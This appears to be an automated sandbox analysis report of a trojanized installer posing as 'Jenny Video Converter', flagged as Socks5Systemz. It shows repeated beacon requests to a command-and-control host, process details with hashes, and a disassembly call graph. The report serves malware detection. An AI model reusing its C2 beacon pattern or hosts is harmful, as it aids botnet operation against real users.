                                                                              61192.168.2.663226185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:50.894640923 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:51.589812994 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:51 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20
                                                                              Oct 8, 2024 04:14:51.701644897 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:51.936835051 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:51 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              62192.168.2.663227185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:52.051650047 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:52.757633924 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:52 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              63192.168.2.663228185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:52.902107954 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:53.599946976 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:53 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              64192.168.2.663229185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:53.722630978 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:54.413630009 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:54 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              65192.168.2.663230185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:54.541883945 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:55.227144003 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:55 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              66192.168.2.663231185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:55.360884905 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:56.065834999 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:55 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              67192.168.2.663232185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:56.193598032 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:56.908514977 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:56 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              68192.168.2.663233185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:57.037122011 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:57.773322105 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:57 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              69192.168.2.663234185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:57.897152901 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:58.597233057 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:58 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              70192.168.2.663235185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:58.727169037 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:14:59.415838003 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:14:59 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              71192.168.2.663236185.208.158.248802760C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 04:14:59.542429924 CEST327OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511 HTTP/1.1
                                                                              Host: diuzout.info
                                                                              User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                              Oct 8, 2024 04:15:00.248508930 CEST220INHTTP/1.1 200 OK
                                                                              Server: nginx/1.20.1
                                                                              Date: Tue, 08 Oct 2024 02:15:00 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              X-Powered-By: PHP/7.4.33
                                                                              Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: e67b680813008c20


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:22:12:54
                                                                              Start date:07/10/2024
                                                                              Path:C:\Users\user\Desktop\N6jsQ3XNNX.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\N6jsQ3XNNX.exe"
                                                                              Imagebase:0x400000
                                                                              File size:4'512'180 bytes
                                                                              MD5 hash:46D2E28BE5AD34097672B73BFA78E805
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:2
                                                                              Start time:22:12:55
                                                                              Start date:07/10/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp" /SL5="$203BE,4230882,54272,C:\Users\user\Desktop\N6jsQ3XNNX.exe"
                                                                              Imagebase:0x400000
                                                                              File size:709'120 bytes
                                                                              MD5 hash:16C9D19AB32C18671706CEFEE19B6949
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:3
                                                                              Start time:22:12:57
                                                                              Start date:07/10/2024
                                                                              Path:C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe" -i
                                                                              Imagebase:0x400000
                                                                              File size:3'296'256 bytes
                                                                              MD5 hash:65FDD2B7C5D23EEF202604FCFEFD2FF4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.3337175115.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:6
                                                                              Start time:22:13:40
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                              Imagebase:0x7ff7403e0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:21%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:2.4%
                                                                                Total number of Nodes:1498
                                                                                Total number of Limit Nodes:22
                                                                                execution_graph 4990 409c40 5031 4030dc 4990->5031 4992 409c56 5034 4042e8 4992->5034 4994 409c5b 5037 40457c GetModuleHandleA GetProcAddress 4994->5037 5000 409c6a 5054 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5000->5054 5017 409d43 5116 4074a0 5017->5116 5019 409d05 5019->5017 5149 409aa0 5019->5149 5020 409d84 5120 407a28 5020->5120 5021 409d69 5021->5020 5022 409aa0 4 API calls 5021->5022 5022->5020 5024 409da9 5130 408b08 5024->5130 5028 409def 5029 408b08 21 API calls 5028->5029 5030 409e28 5028->5030 5029->5028 5159 403094 5031->5159 5033 4030e1 GetModuleHandleA GetCommandLineA 5033->4992 5036 404323 5034->5036 5160 403154 5034->5160 5036->4994 5038 404598 5037->5038 5039 40459f GetProcAddress 5037->5039 5038->5039 5040 4045b5 GetProcAddress 5039->5040 5041 4045ae 5039->5041 5042 4045c4 SetProcessDEPPolicy 5040->5042 5043 4045c8 5040->5043 5041->5040 5042->5043 5044 4065b8 5043->5044 5173 405c98 5044->5173 5053 406604 6F9C1CD0 5053->5000 5055 4090f7 5054->5055 5300 406fa0 SetErrorMode 5055->5300 5060 403198 4 API calls 5061 40913c 5060->5061 5062 409b30 GetSystemInfo VirtualQuery 5061->5062 5063 409be4 5062->5063 5066 409b5a 5062->5066 5068 409768 5063->5068 5064 409bc5 VirtualQuery 5064->5063 5064->5066 5065 409b84 VirtualProtect 5065->5066 5066->5063 5066->5064 5066->5065 5067 409bb3 VirtualProtect 5066->5067 5067->5064 5310 406bd0 GetCommandLineA 5068->5310 5070 409825 5072 4031b8 4 API calls 5070->5072 5071 406c2c 6 API calls 5075 409785 5071->5075 5073 40983f 5072->5073 5076 406c2c 5073->5076 5074 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5074->5075 5075->5070 5075->5071 5075->5074 5077 406c53 GetModuleFileNameA 5076->5077 5078 406c77 GetCommandLineA 5076->5078 5079 403278 4 API calls 5077->5079 5080 406c7c 5078->5080 5081 406c75 5079->5081 5082 406c81 5080->5082 5083 406af0 4 API calls 5080->5083 5086 406c89 5080->5086 5084 406ca4 5081->5084 5085 403198 4 API calls 5082->5085 5083->5080 5087 403198 4 API calls 5084->5087 5085->5086 5088 40322c 4 API calls 5086->5088 5089 406cb9 5087->5089 5088->5084 5090 4031e8 5089->5090 5091 4031ec 5090->5091 5094 4031fc 5090->5094 5093 403254 4 API calls 5091->5093 5091->5094 5092 403228 5096 4074e0 5092->5096 5093->5094 5094->5092 5095 4025ac 4 API calls 5094->5095 5095->5092 5097 4074ea 5096->5097 5331 407576 5097->5331 5334 407578 5097->5334 5098 407516 5099 40752a 5098->5099 5337 40748c GetLastError 5098->5337 5103 409bec FindResourceA 5099->5103 5104 409c01 5103->5104 5105 409c06 SizeofResource 5103->5105 5106 409aa0 4 API calls 5104->5106 5107 409c13 5105->5107 5108 409c18 LoadResource 5105->5108 5106->5105 5109 409aa0 4 API calls 5107->5109 5110 409c26 5108->5110 5111 409c2b LockResource 5108->5111 5109->5108 5114 409aa0 4 API calls 5110->5114 5112 409c37 5111->5112 5113 409c3c 5111->5113 5115 409aa0 4 API calls 5112->5115 5113->5019 5146 407918 5113->5146 5114->5111 5115->5113 5117 4074b4 5116->5117 5118 4074c4 5117->5118 5119 4073ec 20 API calls 5117->5119 5118->5021 5119->5118 5121 407a35 5120->5121 5122 405880 4 API calls 5121->5122 5123 407a89 5121->5123 5122->5123 5124 407918 InterlockedExchange 5123->5124 5125 407a9b 5124->5125 5126 407ab1 5125->5126 5127 405880 4 API calls 5125->5127 5128 407af4 5126->5128 5129 405880 4 API calls 5126->5129 5127->5126 5128->5024 5129->5128 5133 408b39 5130->5133 5138 408b82 5130->5138 5131 408bcd 5445 407cb8 5131->5445 5132 407cb8 21 API calls 5132->5133 5133->5132 5133->5138 5141 403420 4 API calls 5133->5141 5143 4031e8 4 API calls 5133->5143 5436 4034f0 5133->5436 5135 407cb8 21 API calls 5135->5138 5137 408be4 5140 4031b8 4 API calls 5137->5140 5138->5131 5138->5135 5139 4034f0 4 API calls 5138->5139 5144 403420 4 API calls 5138->5144 5145 4031e8 4 API calls 5138->5145 5139->5138 5142 408bfe 5140->5142 5141->5133 5156 404c10 5142->5156 5143->5133 5144->5138 5145->5138 5471 4078c4 5146->5471 5150 409ac1 5149->5150 5151 409aa9 5149->5151 5153 405880 4 API calls 5150->5153 5152 405880 4 API calls 5151->5152 5154 409abb 5152->5154 5155 409ad2 5153->5155 5154->5017 5155->5017 5157 402594 4 API calls 5156->5157 5158 404c1b 5157->5158 5158->5028 5159->5033 5161 403164 5160->5161 5162 40318c TlsGetValue 5160->5162 5161->5036 5163 403196 5162->5163 5164 40316f 5162->5164 5163->5036 5168 40310c 5164->5168 5166 403174 TlsGetValue 5167 403184 5166->5167 5167->5036 5169 403120 LocalAlloc 5168->5169 5170 403116 5168->5170 5171 403132 5169->5171 5172 40313e TlsSetValue 5169->5172 5170->5169 5171->5166 5172->5171 5245 405930 5173->5245 5176 405270 GetSystemDefaultLCID 5180 4052a6 5176->5180 5177 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5177->5180 5178 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5178->5180 5179 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5179->5180 5180->5177 5180->5178 5180->5179 5184 405308 5180->5184 5181 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5181->5184 5182 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5182->5184 5183 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5183->5184 5184->5181 5184->5182 5184->5183 5185 40538b 5184->5185 5278 4031b8 5185->5278 5188 4053b4 GetSystemDefaultLCID 5282 4051fc GetLocaleInfoA 5188->5282 5191 4031e8 4 API calls 5192 4053f4 5191->5192 5193 4051fc 5 API calls 5192->5193 5194 405409 5193->5194 5195 4051fc 5 API calls 5194->5195 5196 40542d 5195->5196 5288 405248 GetLocaleInfoA 5196->5288 5199 405248 GetLocaleInfoA 5200 40545d 5199->5200 5201 4051fc 5 API calls 5200->5201 5202 405477 5201->5202 5203 405248 GetLocaleInfoA 5202->5203 5204 405494 5203->5204 5205 4051fc 5 API calls 5204->5205 5206 4054ae 5205->5206 5207 4031e8 4 API calls 5206->5207 5208 4054bb 5207->5208 5209 4051fc 5 API calls 5208->5209 5210 4054d0 5209->5210 5211 4031e8 4 API calls 5210->5211 5212 4054dd 5211->5212 5213 405248 GetLocaleInfoA 5212->5213 5214 4054eb 5213->5214 5215 4051fc 5 API calls 5214->5215 5216 405505 5215->5216 5217 4031e8 4 API calls 5216->5217 5218 405512 5217->5218 5219 4051fc 5 API calls 5218->5219 5220 405527 5219->5220 5221 4031e8 4 API calls 5220->5221 5222 405534 5221->5222 5223 4051fc 5 API calls 5222->5223 5224 405549 5223->5224 5225 405566 5224->5225 5226 405557 5224->5226 5228 40322c 4 API calls 5225->5228 5296 40322c 5226->5296 5229 405564 5228->5229 5230 4051fc 5 API calls 5229->5230 5231 405588 5230->5231 5232 4055a5 5231->5232 5233 405596 5231->5233 5235 403198 4 API calls 5232->5235 5234 40322c 4 API calls 5233->5234 5236 4055a3 5234->5236 5235->5236 5290 4033b4 5236->5290 5238 4055c7 5239 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5238->5239 5240 4055e1 5239->5240 5241 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5240->5241 5242 4055fb 5241->5242 5243 405ce4 GetVersionExA 5242->5243 5244 405cfb 5243->5244 5244->5053 5246 40593c 5245->5246 5253 404ccc LoadStringA 5246->5253 5249 4031e8 4 API calls 5250 40596d 5249->5250 5256 403198 5250->5256 5260 403278 5253->5260 5257 4031b7 5256->5257 5258 40319e 5256->5258 5257->5176 5258->5257 5274 4025ac 5258->5274 5265 403254 5260->5265 5262 403288 5263 403198 4 API calls 5262->5263 5264 4032a0 5263->5264 5264->5249 5266 403274 5265->5266 5267 403258 5265->5267 5266->5262 5270 402594 5267->5270 5269 403261 5269->5262 5271 402598 5270->5271 5272 4025a2 5270->5272 5271->5272 5273 403154 4 API calls 5271->5273 5272->5269 5272->5272 5273->5272 5275 4025b0 5274->5275 5276 4025ba 5274->5276 5275->5276 5277 403154 4 API calls 5275->5277 5276->5257 5276->5276 5277->5276 5280 4031be 5278->5280 5279 4031e3 5279->5188 5280->5279 5281 4025ac 4 API calls 5280->5281 5281->5280 5283 405223 5282->5283 5284 405235 5282->5284 5286 403278 4 API calls 5283->5286 5285 40322c 4 API calls 5284->5285 5287 405233 5285->5287 5286->5287 5287->5191 5289 405264 5288->5289 5289->5199 5291 4033bc 5290->5291 5292 403254 4 API calls 5291->5292 5293 4033cf 5292->5293 5294 4031e8 4 API calls 5293->5294 5295 4033f7 5294->5295 5297 403230 5296->5297 5298 403252 5297->5298 5299 4025ac 4 API calls 5297->5299 5298->5229 5299->5298 5308 403414 5300->5308 5303 406fee 5304 407284 FormatMessageA 5303->5304 5305 4072aa 5304->5305 5306 403278 4 API calls 5305->5306 5307 4072c7 5306->5307 5307->5060 5309 403418 LoadLibraryA 5308->5309 5309->5303 5317 406af0 5310->5317 5312 406bf3 5313 406c05 5312->5313 5314 406af0 4 API calls 5312->5314 5315 403198 4 API calls 5313->5315 5314->5312 5316 406c1a 5315->5316 5316->5075 5318 406b1c 5317->5318 5319 403278 4 API calls 5318->5319 5320 406b29 5319->5320 5327 403420 5320->5327 5322 406b31 5323 4031e8 4 API calls 5322->5323 5324 406b49 5323->5324 5325 403198 4 API calls 5324->5325 5326 406b6b 5325->5326 5326->5312 5328 403426 5327->5328 5330 403437 5327->5330 5329 403254 4 API calls 5328->5329 5328->5330 5329->5330 5330->5322 5332 407578 5331->5332 5333 4075b7 CreateFileA 5332->5333 5333->5098 5335 403414 5334->5335 5336 4075b7 CreateFileA 5335->5336 5336->5098 5340 4073ec 5337->5340 5341 407284 5 API calls 5340->5341 5342 407414 5341->5342 5343 407434 5342->5343 5349 405184 5342->5349 5352 405880 5343->5352 5346 407443 5347 403198 4 API calls 5346->5347 5348 407460 5347->5348 5348->5099 5356 405198 5349->5356 5353 405887 5352->5353 5354 4031e8 4 API calls 5353->5354 5355 40589f 5354->5355 5355->5346 5357 4051b5 5356->5357 5364 404e48 5357->5364 5359 4051e1 5362 403278 4 API calls 5359->5362 5363 405193 5362->5363 5363->5343 5367 404e63 5364->5367 5365 404e75 5365->5359 5369 404bd4 5365->5369 5367->5365 5372 404f6a 5367->5372 5379 404e3c 5367->5379 5370 405930 5 API calls 5369->5370 5371 404be5 5370->5371 5371->5359 5373 404f7b 5372->5373 5376 404fc9 5372->5376 5375 40504f 5373->5375 5373->5376 5378 404fe7 5375->5378 5386 404e28 5375->5386 5376->5378 5382 404de4 5376->5382 5378->5367 5378->5378 5380 403198 4 API calls 5379->5380 5381 404e46 5380->5381 5381->5367 5383 404df2 5382->5383 5389 404bec 5383->5389 5385 404e20 5385->5376 5402 4039a4 5386->5402 5392 4059a0 5389->5392 5391 404c05 5391->5385 5393 4059ae 5392->5393 5394 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5393->5394 5395 4059d8 5394->5395 5396 405184 19 API calls 5395->5396 5397 4059e6 5396->5397 5398 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5397->5398 